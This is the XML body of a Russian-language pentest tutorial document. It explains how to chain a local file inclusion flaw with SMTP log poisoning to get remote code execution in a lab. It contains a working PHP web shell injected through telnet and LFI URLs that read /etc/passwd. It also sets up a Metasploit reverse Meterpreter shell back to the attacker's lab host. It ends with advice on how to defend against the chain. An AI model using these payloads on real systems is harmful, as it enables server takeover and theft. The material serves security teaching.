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4E79"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Отравление SMTP-логов через LFI и выход на удалённое выполнение кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Учебный материал — только для авторизованного пентеста и лабораторной среды</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В этом документе разбирается составная атака, которая объединяет уязвимость локального включения файлов (LFI) со злоупотреблением почтовым сервисом SMTP и приводит к удалённому выполнению кода (RCE) на веб-сервере. Идея проста, но эффективна: если веб-приложение позволяет подключать произвольные локальные файлы, а служба SMTP записывает подконтрольные злоумышленнику данные в лог-файл, доступный для чтения через ту же LFI, то PHP-код, внедрённый в почтовый лог, будет выполнен веб-сервером. Техника предназначена исключительно для изучения в контролируемой лаборатории или в рамках работ, на которые получено явное разрешение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Подготовка лаборатории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Цель — Linux-сервер с уязвимой PHP-страницей и службой SMTP (например, Postfix), которая пишет почтовые транзакции в общедоступный для чтения лог-файл, такой как /var/log/mail.log. На машине атакующего используются стандартные инструменты: Nmap для разведки, Telnet-клиент для общения с SMTP и фреймворк Metasploit для финального пейлоада.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.107 (уязвимое PHP-приложение + SMTP на порту 25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий: </w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.109 (Nmap, Telnet, Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Шаг 1 — Обнаружение службы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Перед атакой убеждаемся, что служба SMTP слушает порт:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nmap -p25 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сканирование подтверждает, что порт 25/tcp (SMTP) открыт.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Шаг 2 — Проверка уязвимости LFI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Приложение принимает параметр file и подключает локальные файлы без фильтрации. Чтение известного системного файла подтверждает уязвимость и доказывает, что почтовый лог доступен:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Возвращается содержимое /etc/passwd и SMTP-лога, что подтверждает доступ на чтение.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Шаг 3 — Отравление SMTP-лога</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Подключаемся к службе SMTP через Telnet и внедряем PHP-однострочник в поле, которое дословно записывается в почтовый лог. Ошибка «501 Bad recipient address syntax» ожидаема и не мешает тому, что пейлоад попадёт в лог:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>telnet 192.168.1.107 25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MAIL FROM:&lt;attacker@example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RCPT TO:&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. Шаг 4 — Запуск выполнения кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Подключаем отравленный лог через LFI и передаём shell-команду в параметре c. PHP-движок разбирает и выполняет пейлоад, сохранённый в логе:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&amp;c=ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В ответе появляется вывод команды ifconfig, что подтверждает произвольное выполнение команд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>7. Шаг 5 — Переход к интерактивной оболочке</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>С помощью модуля Metasploit web_delivery превращаем одиночную команду в полноценную сессию:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set target 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set payload php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lhost 192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>set lport 8888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сгенерированный PHP-пейлоад вставляем в параметр c в URL с LFI, чтобы запустить его, затем работаем с сессией:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Устанавливается сессия Meterpreter, дающая полный интерактивный доступ к цели.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Отравление SMTP-логов — классический пример того, как две по отдельности ограниченные проблемы (LFI, которая на первый взгляд позволяет лишь читать файлы, и служба SMTP, доверчиво логирующая пользовательский ввод) складываются в полноценное удалённое выполнение кода. С точки зрения защиты цепочку разрывает любое из звеньев: фильтруйте и используйте белый список для параметров включения файлов; никогда не позволяйте веб-серверу исполнять лог-файлы как PHP; храните логи вне web-root с минимальными правами; очищайте данные, которые записывают сетевые службы. Для тестировщика главный урок — всегда учитывать, как находки низкой серьёзности могут складываться в критическое воздействие.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